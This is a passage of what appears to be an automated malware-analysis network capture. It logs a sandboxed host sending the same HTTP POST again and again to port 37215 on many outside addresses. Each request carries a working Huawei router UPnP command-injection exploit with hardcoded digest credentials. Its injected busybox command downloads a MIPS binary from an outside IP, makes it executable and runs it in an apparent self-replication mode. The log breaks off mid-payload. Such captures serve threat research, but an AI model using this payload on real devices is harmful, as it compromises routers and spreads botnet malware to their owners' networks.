                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1866192.168.2.1342168197.65.2.2037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.644891024 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1867192.168.2.1359486197.30.104.20137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.644969940 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1868192.168.2.134495241.172.250.16837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.644978046 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1869192.168.2.135148244.145.217.22937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.644984961 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1870192.168.2.1360302157.109.172.10737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.645015955 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1871192.168.2.135428246.22.131.18137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.645076036 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1872192.168.2.1343450197.43.45.24037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.645102024 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1873192.168.2.1344492197.68.218.1737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.645106077 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1874192.168.2.1360940197.172.228.17037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.645128012 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1875192.168.2.1347454197.155.160.16337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.645152092 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 